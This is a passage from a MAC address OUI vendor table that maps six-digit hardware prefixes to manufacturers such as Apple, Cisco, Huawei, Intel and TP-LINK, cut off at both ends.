Electronics Co.,Ltd 64B853 Samsung Electronics Co.,Ltd E091F5 NETGEAR 00146C NETGEAR 001E2A NETGEAR 00184D NETGEAR 00040E AVM GmbH A06391 NETGEAR 20E52A NETGEAR 4494FC NETGEAR 200CC8 NETGEAR 744401 NETGEAR 000F86 BlackBerry RTS 9CC7A6 AVM GmbH 40BA61 ARIMA Communications Corp. 0011F5 ASKEY COMPUTER CORP 0016E3 ASKEY COMPUTER CORP E839DF ASKEY COMPUTER CORP 0024D2 ASKEY COMPUTER CORP B4EEB4 ASKEY COMPUTER CORP 7CBFB1 ARRIS Group, Inc. 001311 ARRIS Group, Inc. 0016B8 Sony Corporation 0024EF Sony Corporation 0025E7 Sony Corporation 58170C Sony Corporation 5CB524 Sony Corporation 90C115 Sony Corporation 745612 ARRIS Group, Inc. E46449 ARRIS Group, Inc. 40FC89 ARRIS Group, Inc. 2C9E5F ARRIS Group, Inc. 0023EE ARRIS Group, Inc. 001ADE ARRIS Group, Inc. 001CC1 ARRIS Group, Inc. 001E5A ARRIS Group, Inc. 001626 ARRIS Group, Inc. 0050E3 ARRIS Group, Inc. 001371 ARRIS Group, Inc. 0019A6 ARRIS Group, Inc. 002636 ARRIS Group, Inc. 002136 ARRIS Group, Inc. 080046 Sony Corporation 74DAEA Texas Instruments D887D5 Leadcore Technology CO.,LTD 00F28B Cisco Systems, Inc 4C14A3 TCL Technoly Electronics (Huizhou) Co., Ltd. D0DF9A Liteon Technology Corporation 1C659D Liteon Technology Corporation 3010B3 Liteon Technology Corporation E8C74F Liteon Technology Corporation D05349 Liteon Technology Corporation ECF00E AboCom 00E098 AboCom D05162 Sony Corporation 18002D Sony Corporation 280DFC Sony Interactive Entertainment Inc. 701A04 Liteon Technology Corporation 48D224 Liteon Technology Corporation 20689D Liteon Technology Corporation E8F724 Hewlett Packard Enterprise 948815 Infinique Worldwide Inc D0E44A Murata Manufacturing Co., Ltd. 002553 ADB Broadband Italia 00193E ADB Broadband Italia 000827 ADB Broadband Italia E874E6 ADB Broadband Italia 0020E0 Actiontec Electronics, Inc 002662 Actiontec Electronics, Inc 384FF0 AzureWave Technology Inc. 742F68 AzureWave Technology Inc. A48E0A DeLaval International AB AC2B6E Intel Corporate F8E079 Motorola Mobility LLC, a Lenovo Company CCC3EA Motorola Mobility LLC, a Lenovo Company 40786A Motorola Mobility LLC, a Lenovo Company 4CB0E8 Beijing RongZhi xinghua technology co., LTD 002315 Intel Corporate 00166F Intel Corporate 0019D1 Intel Corporate 0019D2 Intel Corporate 001B21 Intel Corporate 18FF0F Intel Corporate B4B676 Intel Corporate 3CA9F4 Intel Corporate 9C4E36 Intel Corporate 3413E8 Intel Corporate 34E6AD Intel Corporate 081196 Intel Corporate 183DA2 Intel Corporate 809B20 Intel Corporate 34DE1A Intel Corporate E8B1FC Intel Corporate CC3D82 Intel Corporate 001F3C Intel Corporate 002710 Intel Corporate 002314 Intel Corporate 340286 Intel Corporate 001CBF Intel Corporate B88A60 Intel Corporate 78FF57 Intel Corporate 40F201 Sagemcom Broadband SAS D084B0 Sagemcom Broadband SAS 181E78 Sagemcom Broadband SAS 0037B7 Sagemcom Broadband SAS 0054BD Swelaser AB 001E4C Hon Hai Precision Ind. Co.,Ltd. D8543A Texas Instruments 649C8E Texas Instruments 102EAF Texas Instruments 7C8EE4 Texas Instruments 388602 Flexoptix GmbH 4065A3 Sagemcom Broadband SAS 149182 Belkin International Inc. 20BB76 COL GIOVANNI PAOLO SpA 000A8A Cisco Systems, Inc 9C3583 Nipro Diagnostics, Inc C06118 TP-LINK TECHNOLOGIES CO.,LTD. 00183F 2Wire Inc 3CDD89 SOMO HOLDINGS & TECH. CO.,LTD. 1801E3 Bittium Wireless Ltd 18622C Sagemcom Broadband SAS 3C81D8 Sagemcom Broadband SAS D02212 IEEE Registration Authority 100723 IEEE Registration Authority A44F29 IEEE Registration Authority 74F8DB IEEE Registration Authority A43BFA IEEE Registration Authority 002456 2Wire Inc C0830A 2Wire Inc 383BC8 2Wire Inc 60FE20 2Wire Inc 5464D9 Sagemcom Broadband SAS 00194B Sagemcom Broadband SAS 001E74 Sagemcom Broadband SAS 24DA11 NO NDA Inc 00195B D-Link Corporation 000F3D D-Link Corporation F4F5D8 Google, Inc. EC2280 D-Link International C4EDBA Texas Instruments 9059AF Texas Instruments BC6A29 Texas Instruments 847E40 Texas Instruments 9C8E99 Hewlett Packard D03761 Texas Instruments C83E99 Texas Instruments 40984E Texas Instruments 0017EB Texas Instruments 0017E6 Texas Instruments B4EED4 Texas Instruments 001832 Texas Instruments 3C2DB7 Texas Instruments 18AF61 Apple, Inc. 5CF938 Apple, Inc. 0C0535 Juniper Systems BC83A7 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD BCEC23 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD AC06C7 ServerNet S.r.l. B0C090 Chicony Electronics Co., Ltd. 907F61 Chicony Electronics Co., Ltd. 001DCD ARRIS Group, Inc. 001DD2 ARRIS Group, Inc. E83EFC ARRIS Group, Inc. 0059AC KPN. B.V. 001735 Intel Wireless Network Group 74AC5F Qiku Internet Network Scientific (Shenzhen) Co., Ltd. 24DF6A HUAWEI TECHNOLOGIES CO.,LTD 40D855 IEEE Registration Authority 34AB37 Apple, Inc. 38CADA Apple, Inc. D0B33F Shenzhen TINNO Mobile Technology Corp. BCD1D3 Shenzhen TINNO Mobile Technology Corp. D83C69 Shenzhen TINNO Mobile Technology Corp. 2400BA HUAWEI TECHNOLOGIES CO.,LTD 788B77 Standar Telecom 8C579B Wistron Neweb Corporation E8ED05 ARRIS Group, Inc. 789684 ARRIS Group, Inc. CC65AD ARRIS Group, Inc. 00207B Intel Corporation 900DCB ARRIS Group, Inc. 8C09F4 ARRIS Group, Inc. DCFB02 BUFFALO.INC 8857EE BUFFALO.INC 101F74 Hewlett Packard 009C02 Hewlett Packard 0019BB Hewlett Packard 38E7D8 HTC Corporation 188796 HTC Corporation B4CEF6 HTC Corporation 7C7D3D HUAWEI TECHNOLOGIES CO.,LTD 4482E5 HUAWEI TECHNOLOGIES CO.,LTD 00234E Hon Hai Precision Ind. Co.,Ltd. 3C4A92 Hewlett Packard 002376 HTC Corporation 780CB8 Intel Corporate 185E0F Intel Corporate 3CA82A Hewlett Packard 2C233A Hewlett Packard 000A57 Hewlett Packard 0001E7 Hewlett Packard 0001E6 Hewlett Packard 00306E Hewlett Packard 001175 Intel Corporation 001560 Hewlett Packard 001635 Hewlett Packard 0008C7 Hewlett Packard 0010E3 Hewlett Packard 000883 Hewlett Packard 8CDCD4 Hewlett Packard 001F29 Hewlett Packard 00215A Hewlett Packard 00237D Hewlett Packard 002655 Hewlett Packard 000D9D Hewlett Packard D4C9EF Hewlett Packard FC15B4 Hewlett Packard DCD321 HUMAX Co., Ltd. 940937 HUMAX Co., Ltd. E84DD0 HUAWEI TECHNOLOGIES CO.,LTD 0C45BA HUAWEI TECHNOLOGIES CO.,LTD 20906F Shenzhen Tencent Computer System Co., Ltd. 6CE3B6 Nera Telecommunications Ltd. EC5F23 Qinghai Kimascend Electronics Technology Co. Ltd. 047D50 Shenzhen Kang Ying Technology Co.Ltd. 54EFFE Fullpower Technologies, Inc. CC4463 Apple, Inc. 6C72E7 Apple, Inc. 741BB2 Apple, Inc. 001D0F TP-LINK TECHNOLOGIES CO.,LTD. 0023CD TP-LINK TECHNOLOGIES CO.,LTD. 2C8158 Hon Hai Precision Ind. Co.,Ltd. 8002DF ORA Inc. C46E1F TP-LINK TECHNOLOGIES CO.,LTD. 50FA84 TP-LINK TECHNOLOGIES CO.,LTD. 44B32D TP-LINK TECHNOLOGIES CO.,LTD. 882593 TP-LINK TECHNOLOGIES CO.,LTD. 001FE1 Hon Hai Precision Ind. Co.,Ltd. D85D4C TP-LINK TECHNOLOGIES CO.,LTD. A0F3C1 TP-LINK TECHNOLOGIES CO.,LTD. 6CE873 TP-LINK TECHNOLOGIES CO.,LTD. 006057 Murata Manufacturing Co., Ltd. 783E53 SKY UK LIMITED 0019FB SKY UK LIMITED C4F57C Brocade Communications Systems LLC 0012F2 Brocade Communications Systems LLC 00051E Brocade Communications Systems LLC 384608 zte corporation 4CAC0A zte corporation B4B362 zte corporation 10A5D0 Murata Manufacturing Co., Ltd. 00F81C HUAWEI TECHNOLOGIES CO.,LTD 087A4C HUAWEI TECHNOLOGIES CO.,LTD ACE215 HUAWEI TECHNOLOGIES CO.,LTD 346BD3 HUAWEI TECHNOLOGIES CO.,LTD 70723C HUAWEI TECHNOLOGIES CO.,LTD ACE87B HUAWEI TECHNOLOGIES CO.,LTD 083E8E Hon Hai Precision Ind. Co.,Ltd. 90489A Hon Hai Precision Ind. Co.,Ltd. 0071CC Hon Hai Precision Ind. Co.,Ltd. B05B67 HUAWEI TECHNOLOGIES CO.,LTD CCA223 HUAWEI TECHNOLOGIES CO.,LTD F83DFF HUAWEI TECHNOLOGIES CO.,LTD 285FDB HUAWEI TECHNOLOGIES CO.,LTD 404D8E HUAWEI TECHNOLOGIES CO.,LTD 4C5499 HUAWEI TECHNOLOGIES CO.,LTD 70A8E3 HUAWEI TECHNOLOGIES CO.,LTD F8E811 HUAWEI TECHNOLOGIES CO.,LTD 200BC7 HUAWEI TECHNOLOGIES CO.,LTD F84ABF HUAWEI TECHNOLOGIES CO.,LTD 78D752 HUAWEI TECHNOLOGIES CO.,LTD 104780 HUAWEI TECHNOLOGIES CO.,LTD B075D5 zte corporation D0154A zte corporation 0026ED zte corporation 002293 zte corporation 84DBAC HUAWEI TECHNOLOGIES CO.,LTD 94772B HUAWEI TECHNOLOGIES CO.,LTD D440F0 HUAWEI TECHNOLOGIES CO.,LTD 04021F HUAWEI TECHNOLOGIES CO.,LTD 50A72B HUAWEI TECHNOLOGIES CO.,LTD 0CD6BD HUAWEI TECHNOLOGIES CO.,LTD 786A89 HUAWEI TECHNOLOGIES CO.,LTD 14B968 HUAWEI TECHNOLOGIES CO.,LTD 5CF96A HUAWEI TECHNOLOGIES CO.,LTD F49FF3 HUAWEI TECHNOLOGIES CO.,LTD 240995 HUAWEI TECHNOLOGIES CO.,LTD 048A15 Avaya Inc B4B017 Avaya Inc 90FB5B Avaya Inc C8F406 Avaya Inc 7052C5 Avaya Inc 00040D Avaya Inc F81547 Avaya Inc 506184 Avaya Inc 10CDAE Avaya Inc 640980 Xiaomi Communications Co Ltd 185936 Xiaomi Communications Co Ltd 20A783 miControl GmbH 544A16 Texas Instruments 74D6EA Texas Instruments 209148 Texas Instruments F8A45F Xiaomi Communications Co Ltd 548998 HUAWEI TECHNOLOGIES CO.,LTD 30D17E HUAWEI TECHNOLOGIES CO.,LTD 0050BD Cisco Systems, Inc 00906F Cisco Systems, Inc 0050F0 Cisco Systems, Inc 94049C HUAWEI TECHNOLOGIES CO.,LTD 688F84 HUAWEI TECHNOLOGIES CO.,LTD 00605C Cisco Systems, Inc 0006C1 Cisco Systems, Inc 00E014 Cisco Systems, Inc 60735C Cisco Systems, Inc 34A84E Cisco Systems, Inc 005014 Cisco Systems, Inc 0090F2 Cisco Systems, Inc B05947 Shenzhen Qihu Intelligent Technology Company Limited 004096 Cisco Systems, Inc E86549 Cisco Systems, Inc B07D47 Cisco Systems, Inc 38ED18 Cisco Systems, Inc 1C1D86 Cisco Systems, Inc 001731 ASUSTek COMPUTER INC. 002215 ASUSTek COMPUTER INC. E0CB4E ASUSTek COMPUTER INC. BCF1F2 Cisco Systems, Inc C80084 Cisco Systems, Inc 40A6E8 Cisco Systems, Inc 001947 Cisco SPVTG 001839 Cisco-Linksys, LLC 2C3ECF Cisco Systems, Inc 508789 Cisco Systems, Inc 381C1A Cisco Systems, Inc BC671C Cisco Systems, Inc 346288 Cisco Systems, Inc CCD8C1 Cisco Systems, Inc 7C0ECE Cisco Systems, Inc A0ECF9 Cisco Systems, Inc 547C69 Cisco Systems, Inc 0CE0E4 PLANTRONICS, INC. 74A2E6 Cisco Systems, Inc 3085A9 ASUSTek COMPUTER INC. B83861 Cisco Systems, Inc 580A20 Cisco Systems, Inc 54781A Cisco Systems, Inc E02F6D Cisco Systems, Inc 58971E Cisco Systems, Inc B4E9B0 Cisco Systems, Inc 000832 Cisco Systems, Inc DCA5F4 Cisco Systems, Inc 5017FF Cisco Systems, Inc 189C5D Cisco Systems, Inc 5CA48A Cisco Systems, Inc 70105C Cisco Systems, Inc 10F311 Cisco Systems, Inc 382056 Cisco Systems, Inc DCCEC1 Cisco Systems, Inc 9C57AD Cisco Systems, Inc 60FEC5 Apple, Inc. E425E7 Apple, Inc. BC926B Apple, Inc. 101C0C Apple, Inc. 080007 Apple, Inc. 0016CB Apple, Inc. 0017F2 Apple, Inc. 189EFC Apple, Inc. 804971 Apple, Inc. 6C3E6D Apple, Inc. BC6778 Apple, Inc. 20C9D0 Apple, Inc. 68967B Apple, Inc. 581FAA Apple, Inc. 88C663 Apple, Inc. A46706 Apple, Inc. 8C5877 Apple, Inc. 7CF05F Apple, Inc. 7C6D62 Apple, Inc. 40D32D Apple, Inc. C42C03 Apple, Inc. 9027E4 Apple, Inc. 109ADD Apple, Inc. 84FCFE Apple, Inc. E48B7F Apple, Inc. D8D1CB Apple, Inc. A8FAD8 Apple, Inc. 283737 Apple, Inc. 50EAD6 Apple, Inc. B817C2 Apple, Inc. 7C11BE Apple, Inc. 001F5B Apple, Inc. 002436 Apple, Inc. 00254B Apple, Inc. 98D6BB Apple, Inc. 34E2FD Apple, Inc. 04489A Apple, Inc. C0F2FB Apple, Inc. 24E314 Apple, Inc. 80E650 Apple, Inc. 90FD61 Apple, Inc. 2CF0EE Apple, Inc. ACCF5C Apple, Inc. 80006E Apple, Inc. 848E0C Apple, Inc. 3C15C2 Apple, Inc. 6C709F Apple, Inc. 6476BA Apple, Inc. 5C97F3 Apple, Inc. D4F46F Apple, Inc. 48437C Apple, Inc. 34A395 Apple, Inc. 787E61 Apple, Inc. 60F81D Apple, Inc. 5CF5DA Apple, Inc. 18EE69 Apple, Inc. 649ABE Apple, Inc. F099BF Apple, Inc. 94E96A Apple, Inc. AC293A Apple, Inc. 087045 Apple, Inc. A88808 Apple, Inc. A4C361 Apple, Inc. B09FBA Apple, Inc. 0C4DE9 Apple, Inc. 008865 Apple, Inc. BC3BAF Apple, Inc. 3CE072 Apple, Inc. 38484C Apple, Inc. 9CFC01 Apple, Inc. 9C35EB Apple, Inc. 507A55 Apple, Inc. E0F5C6 Apple, Inc. A0EDCD Apple, Inc. F0F61C Apple, Inc. 8C2937 Apple, Inc. 38C986 Apple, Inc. D03311 Apple, Inc. F0F249 Hitron Technologies. Inc C8C2C6 Shanghai Airm2m Communication Technology Co., Ltd DCFE07 PEGATRON CORPORATION 789C85 August Home, Inc. 5882A8 Microsoft 707938 Wuxi Zhanrui Electronic Technology Co.,LTD B813E9 Trace Live Network 58685D Tempo Australia Pty Ltd 243184 SHARP Corporation 582BDB Pax AB 24DA9B Motorola Mobility LLC, a Lenovo Company F00D5C JinQianMao Technology Co.,Ltd. 54BE53 zte corporation EC388F HUAWEI TECHNOLOGIES CO.,LTD E03676 HUAWEI TECHNOLOGIES CO.,LTD C49E41 G24 Power Limited D03E5C HUAWEI TECHNOLOGIES CO.,LTD 280E8B Beijing Spirit Technology Development Co., Ltd. F44D30 Elitegroup Computer Systems Co.,Ltd. 30E090 Genevisio Ltd. 38D40B Samsung Electronics Co.,Ltd E83A12 Samsung Electronics Co.,Ltd 80656D Samsung Electronics Co.,Ltd 209BCD Apple, Inc. 80B709 Viptela, Inc 94BBAE Husqvarna AB D40AA9 ARRIS Group, Inc. 203D66 ARRIS Group, Inc. D494E8 HUAWEI TECHNOLOGIES CO.,LTD B078F0 Beijing HuaqinWorld Technology Co.,Ltd. A4DCBE HUAWEI TECHNOLOGIES CO.,LTD ECB870 Beijing Heweinet Technology Co.,Ltd. 3095E3 SHANGHAI SIMCOM LIMITED FCF136 Samsung Electronics Co.,Ltd B88687 Liteon Technology Corporation 0894EF Wistron Infocomm (Zhongshan) Corporation 283713 Shenzhen 3Nod Digital Technology Co., Ltd. E0319E Valve Corporation 7CAB25 MESMO TECHNOLOGY INC. 3C5CC3 Shenzhen First Blue Chip Technology Ltd ECEED8 ZTLX Network Technology Co.,Ltd 80EB77 Wistron Corporation 483974 Proware Technologies Co., Ltd. 30FFF6 HangZhou KuoHeng Technology Co.,ltd 7CA237 King Slide Technology CO., LTD. D404CD ARRIS Group, Inc. 584822 Sony Corporation 747336 MICRODIGTAL Inc C49FF3 Mciao Technologies, Inc. 788E33 Jiangsu SEUIC Technology Co.,Ltd 584925 E3 Enterprise 94F278 Elma Electronic D8EFCD Nokia Solutions and Networks GmbH & Co. KG 4CC681 Shenzhen Aisat Electronic Co., Ltd. 48E244 Hon Hai Precision Ind. Co.,Ltd. 18895B Samsung Electronics Co.,Ltd B0411D ITTIM Technologies F8BF09 HUAWEI TECHNOLOGIES CO.,LTD A0A65C Supercomputing Systems AG 884157 Shenzhen Atsmart Technology Co.,Ltd. 3481F4 SST Taiwan Ltd. 382B78 ECO PLUGS ENTERPRISE CO., LTD A47B2C Nokia DCDB70 Tonfunk Systementwicklung und Service GmbH F80D60 CANON INC. F0182B LG Chem E8377A Zyxel Communications Corporation 803B2A ABB Xiamen Low Voltage Equipment Co.,Ltd. 800B51 Chengdu XGimi Technology Co.,Ltd 00A784 ITX security 7CB25C Acacia Communications 38FACA Skyworth Digital Technology(Shenzhen) Co.,Ltd 149A10 Microsoft Corporation 5CB43E HUAWEI TECHNOLOGIES CO.,LTD 54E140 INGENICO E4907E Motorola Mobility LLC, a Lenovo Company 707781 Hon Hai Precision Ind. Co.,Ltd. 24E5AA Philips Oral Healthcare, Inc. 78BDBC Samsung Electronics Co.,Ltd 349B5B Maquet GmbH 84119E Samsung Electronics Co.,Ltd 287610 IgniteNet 746A3A Aperi Corporation 94A7B7 zte corporation 1844E6 zte corporation 3CCE15 Mercedes-Benz USA, LLC D89A34 Beijing SHENQI Technology Co., Ltd. C4EA1D Technicolor Delivery Technologies Belgium NV 7CF90E Samsung Electronics Co.,Ltd 50F0D3 Samsung Electronics Co.,Ltd E48D8C Routerboard.com CC19A8 PT Inovação e Sistemas SA 485073 Microsoft Corporation 20D75A Posh Mobile Limited F41563 F5 Networks, Inc. 8C8B83 Texas Instruments 4011DC Sonance 10AF78 Shenzhen ATUE Technology Co., Ltd 081FEB BinCube 785F4C Argox Information Co., Ltd. 6C1E70 Guangzhou YBDS IT Co.,Ltd D8ADDD Sonavation, Inc. 8833BE Ivenix, Inc. 54B80A D-Link International 34CC28 Nexpring Co. LTD., 54E2C8 Dongguan Aoyuan Electronics Technology Co., Ltd B4B265 DAEHO I&T 1C8341 Hefei Bitland Information Technology Co.Ltd 706879 Saijo Denki International Co., Ltd. E03560 Challenger Supply Holdings, LLC 249EAB HUAWEI TECHNOLOGIES CO.,LTD 3CCB7C TCT mobile ltd E4CE70 Health & Life co., Ltd. CCA4AF Shenzhen Sowell Technology Co., LTD 102C83 XIMEA 709C8F Nero AG 6CA75F zte corporation 8C7967 zte corporation 7858F3 Vachen Co.,Ltd 244B03 Samsung Electronics Co.,Ltd 0071C2 PEGATRON CORPORATION 7C8274 Shenzhen Hikeen Technology CO.,LTD 74E28C Microsoft Corporation F07959 ASUSTek COMPUTER INC. 704E66 SHENZHEN FAST TECHNOLOGIES CO.,LTD 244B81 Samsung Electronics Co.,Ltd D855A3 zte corporation 38D82F zte corporation 60D9A0 Lenovo Mobile Communication Technology Ltd. 94D417 GPI KOREA INC. 60AF6D Samsung Electronics Co.,Ltd B85A73 Samsung Electronics Co.,Ltd E08E3C Aztech Electronics Pte Ltd 844BB7 Beijing Sankuai Online Technology Co.,Ltd 68F0BC Shenzhen LiWiFi Technology Co., Ltd 2884FA SHARP Corporation ACABBF AthenTek Inc. 981DFA Samsung Electronics Co.,Ltd 186882 Beward R&D Co., Ltd. 300EE3 Aquantia Corporation 3C1E04 D-Link International 18F145 NetComm Wireless Limited D88D5C Elentec EC8009 NovaSparks 3C1A0F ClearSky Data 68B983 b-plus GmbH 50ADD5 Dynalec Corporation B04519 TCT mobile ltd 78B3B9 ShangHai sunup lighting CO.,LTD 04C09C Tellabs Inc. 8C0551 Koubachi AG D897BA PEGATRON CORPORATION A8D88A Wyconn 948E89 INDUSTRIAS UNIDAS SA DE CV E8CC18 D-Link International B09137 ISis ImageStream Internet Solutions, Inc 7429AF Hon Hai Precision Ind. Co.,Ltd. 40EACE FOUNDER BROADBAND NETWORK SERVICE CO.,LTD 848EDF Sony Corporation A49D49 Ketra, Inc. 2C5089 Shenzhen Kaixuan Visual Technology Co.,Limited 207693 Lenovo (Beijing) Limited. 600417 POSBANK CO.,LTD C03896 Hon Hai Precision Ind. Co.,Ltd. EC3C5A SHEN ZHEN HENG SHENG HUI DIGITAL TECHNOLOGY CO.,LTD 4488CB Camco Technologies NV 50294D NANJING IOT SENSOR TECHNOLOGY CO,LTD 0CCFD1 SPRINGWAVE Co., Ltd 00AEFA Murata Manufacturing Co., Ltd. 841826 Osram GmbH F8E903 D-Link International E89606 testo Instruments (Shenzhen) Co., Ltd. 74BADB Longconn Electornics(shenzhen)Co.,Ltd F82441 Yeelink 1C7E51 3bumen.com 6872DC CETORY.TV Company Limited 084656 VEO-LABS 108A1B RAONIX Inc. B8F317 iSun Smasher Communications Private Limited 8CF813 ORANGE POLSKA 909F33 EFM Networks 2497ED Techvision Intelligent Technology Limited 3077CB Maike Industry(Shenzhen)CO.,LTD F42853 Zioncom Electronics (Shenzhen) Ltd. 1C9C26 Zoovel Technologies D4EC86 LinkedHope Intelligent Technologies Co., Ltd 046785 scemtec Hard- und Software fuer Mess- und Steuerungstechnik GmbH D0FA1D Qihoo 360 Technology Co.,Ltd 8432EA ANHUI WANZTEN P&T CO., LTD E01D38 Beijing HuaqinWorld Technology Co.,Ltd E47FB2 FUJITSU LIMITED 7824AF ASUSTek COMPUTER INC. B89BE4 ABB Power Systems Power Generation FC6DC0 BME CORPORATION 24D13F MEXUS CO.,LTD A81B5D Foxtel Management Pty Ltd AC11D3 Suzhou HOTEK Video Technology Co. Ltd 6CBFB5 Noon Technology Co., Ltd 102F6B Microsoft Corporation FC9FE1 CONWIN.Tech. Ltd 68F06D ALONG INDUSTRIAL CO., LIMITED 945493 Rigado, LLC 0CAC05 Unitend Technologies Inc. 80AD67 Kasda Networks Inc 30B5F1 Aitexin Technology Co., Ltd B01041 Hon Hai Precision Ind. Co.,Ltd. 3CAA3F iKey, Ltd. 0C383E Fanvil Technology Co., Ltd. 60CDA9 Abloomy B8AD3E BLUECOM 183009 Woojin Industrial Systems Co., Ltd. 74DBD1 Ebay Inc 505065 TAKT Corporation 40C62A Shanghai Jing Ren Electronic Technology Co., Ltd. E8150E Nokia Corporation DC537C Compal Broadband Networks, Inc. C44202 Samsung Electronics Co.,Ltd B4AE6F Circle Reliance, Inc DBA Cranberry Networks 90DA6A FOCUS H&S Co., Ltd. 4C6E6E Comnect Technology CO.,LTD 8C3357 HiteVision Digital Media Technology Co.,Ltd. 103047 Samsung Electronics Co.,Ltd 5C2E59 Samsung Electronics Co.,Ltd F884F2 Samsung Electronics Co.,Ltd 44A6E5 THINKING TECHNOLOGY CO.,LTD A45DA1 ADB Broadband Italia 84948C Hitron Technologies. Inc A8F7E0 PLANET Technology Corporation 4486C1 Siemens Low Voltage & Products 4045DA Spreadtrum Communications (Shanghai) Co., Ltd. 3451AA JID GLOBAL E0CBEE Samsung Electronics Co.,Ltd 4C3909 HPL Electric & Power Private Limited 907EBA UTEK TECHNOLOGY (SHENZHEN) CO.,LTD A002DC Amazon Technologies Inc. 98BE94 IBM C46BB4 myIDkey B49EAC Imagik Int'l Corp 542AA2 Alpha Networks Inc. 6C198F D-Link International C8FF77 Dyson Limited 54B753 Hunan Fenghui Yinjia Science And Technology Co.,Ltd B0754D Nokia CC07E4 Lenovo Mobile Communication Technology Ltd. 4C8B30 Actiontec Electronics, Inc 0805CD DongGuang EnMai Electronic Product Co.Ltd. 18FF2E Shenzhen Rui Ying Da Technology Co., Ltd 847207 I&C Technology 0874F6 Winterhalter Gastronom GmbH 0C63FC Nanjing Signway Technology Co., Ltd D4E08E ValueHD Corporation C89F1D SHENZHEN COMMUNICATION TECHNOLOGIES CO.,LTD 2C39C1 Ciena Corporation 54EE75 Wistron InfoComm(Kunshan)Co.,Ltd. D8492F CANON INC. 800E24 ForgetBox 143DF2 Beijing Shidai Hongyuan Network Communication Co.,Ltd ACB859 Uniband Electronic Corp, 88B1E1 Mojo Networks, Inc. 6047D4 FORICS Electronic Technology Co., Ltd. 54D163 MAX-TECH,INC 48B5A7 Glory Horse Industries Ltd. 0C4F5A ASA-RT s.r.l. CCA614 AIFA TECHNOLOGY CORP. 90F1B0 Hangzhou Anheng Info&Tech CO.,LTD C4291D KLEMSAN ELEKTRIK ELEKTRONIK SAN.VE TIC.AS. FCF8B7 TRONTEQ Electronic 30F42F ESP 704E01 KWANGWON TECH CO., LTD. 3C25D7 Nokia Corporation 30A8DB Sony Corporation 7CE4AA Private 083F3E WSH GmbH 1820A6 Sage Co., Ltd. 20EAC7 SHENZHEN RIOPINE ELECTRONICS CO., LTD 64B370 PowerComm Solutions LLC 746A8F VS Vision Systems GmbH 54A31B Shenzhen Linkworld Technology Co,.LTD CC398C Shiningtek 6C5F1C Lenovo Mobile Communication Technology Ltd. 5CF50D Institute of microelectronic applications 749C52 Huizhou Desay SV Automotive Co., Ltd. 10DEE4 automationNEXT GmbH F03A4B Bloombase, Inc. 2C957F zte corporation 90DB46 E-LEAD ELECTRONIC CO., LTD 344F5C R&M AG D4224E Alcatel Lucent 9C86DA Phoenix Geophysics Ltd. 2C073C DEVLINE LIMITED 7C1A03 8Locations Co., Ltd. D8EE78 Moog Protokraft 7CE1FF Computer Performance, Inc. DBA Digital Loggers, Inc. D8150D TP-LINK TECHNOLOGIES CO.,LTD. 5850AB TLS Corporation C4C0AE MIDORI ELECTRONIC CO., LTD. ACC595 Graphite Systems 98FF6A OTEC(Shanghai)Technology Co.,Ltd. 8425A4 Tariox Limited 483D32 Syscor Controls & Automation A0E453 Sony Corporation 404A18 Addrek Smart Solutions C0C569 SHANGHAI LYNUC CNC TECHNOLOGY CO.,LTD 7CCD11 MS-Magnet BC1A67 YF Technology Co., Ltd AC6BAC Jenny Science AG 3C0C48 Servergy, Inc. CC856C SHENZHEN MDK DIGITAL TECHNOLOGY CO.,LTD E0C86A SHENZHEN TW-SCIE Co., Ltd 1879A2 GMJ ELECTRIC LIMITED BCEE7B ASUSTek COMPUTER INC. 3413A8 Mediplan Limited 241148 Entropix, LLC 4CD7B6 Helmer Scientific 085AE0 Recovision Technology Co., Ltd. 3C18A0 Luxshare Precision Industry Company Limited 94E98C Nokia 8CAE89 Y-cam Solutions Ltd FCE1D9 Stable Imaging Solutions LLC 50206B Emerson Climate Technologies Transportation Solutions B04545 YACOUB Automation GmbH C8EE75 Pishion International Co. Ltd C445EC Shanghai Yali Electron Co.,LTD E0E631 SNB TECHNOLOGIES LIMITED F8572E Core Brands, LLC 78B5D2 Ever Treasure Industrial Limited 7C9763 Openmatics s.r.o. 38CA97 Contour Design LLC BC2D98 ThinGlobal LLC 50ED78 Changzhou Yongse Infotech Co.,Ltd 1CC11A Wavetronix 90028A Shenzhen Shidean Legrand Electronic Products Co.,Ltd CC3429 TP-LINK TECHNOLOGIES CO.,LTD. 7CBF88 Mobilicom LTD 60DB2A HNS CC7498 Filmetrics Inc. 64BABD SDJ Technologies, Inc. 24C848 mywerk Portal GmbH 68FCB3 Next Level Security Systems, Inc. 9CD643 D-Link International FC09D8 ACTEON Group 743ECB Gentrice tech 7C444C Entertainment Solutions, S.L. CCFB65 Nintendo Co., Ltd. A0A23C GPMS 48A2B7 Kodofon JSC 0444A1 TELECON GALICIA,S.A. 20C60D Shanghai annijie Information technology Co.,LTD 5CD61F Qardio, Inc 682DDC Wuhan Changjiang Electro-Communication Equipment CO.,LTD E8611F Dawning Information Industry Co.,Ltd 705957 Medallion Instrumentation Systems 94C3E4 Atlas Copco IAS GmbH 20E791 Siemens Healthcare Diagnostics, Inc 089758 Shenzhen Strong Rising Electronics Co.,Ltd DongGuan Subsidiary FC19D0 Cloud Vision Networks Technology Co.,Ltd. 9486D4 Surveillance Pro Corporation 9C443D CHENGDU XUGUANG TECHNOLOGY CO, LTD FCD817 Beijing Hesun Technologies Co.Ltd. 5027C7 TECHNART Co.,Ltd 6C5AB5 TCL Technoly Electronics (Huizhou) Co., Ltd. B43E3B Viableware, Inc 0C5CD8 DOLI Elektronik GmbH 34885D Logitech Far East 88576D XTA Electronics Ltd BC4100 CODACO ELECTRONIC s.r.o. B424E7 Codetek Technology Co.,Ltd 542F89 Euclid Laboratories, Inc. 2847AA Nokia Corporation 00A2FF abatec group AG 6024C1 Jiangsu Zhongxun Electronic Technology Co., Ltd 60A9B0 Merchandising Technologies, Inc 3C15EA TESCOM CO., LTD. E80410 Private 909916 ELVEES NeoTek OJSC A0143D PARROT SA FC1BFF V-ZUG AG 5C026A Applied Vision Corporation 0C9301 PT. Prasimax Inovasi Teknologi 746630 T:mi Ytti 6CB350 Anhui comhigher tech co.,ltd 3859F8 MindMade Sp. z o.o. 4CDF3D TEAM ENGINEERS ADVANCE TECHNOLOGIES INDIA PVT LTD F4BD7C Chengdu jinshi communication Co., LTD DCC422 Systembase Limited C8F36B Yamato Scale Co.,Ltd. 6CD1B0 WING SING ELECTRONICS HONG KONG LIMITED 98F8C1 IDT Technology Limited A4F522 CHOFU SEISAKUSHO CO.,LTD 845C93 Chabrier Services 68E166 Private 60FEF9 Thomas & Betts B8DC87 IAI Corporation 34A3BF Terewave. Inc. 8C088B Remote 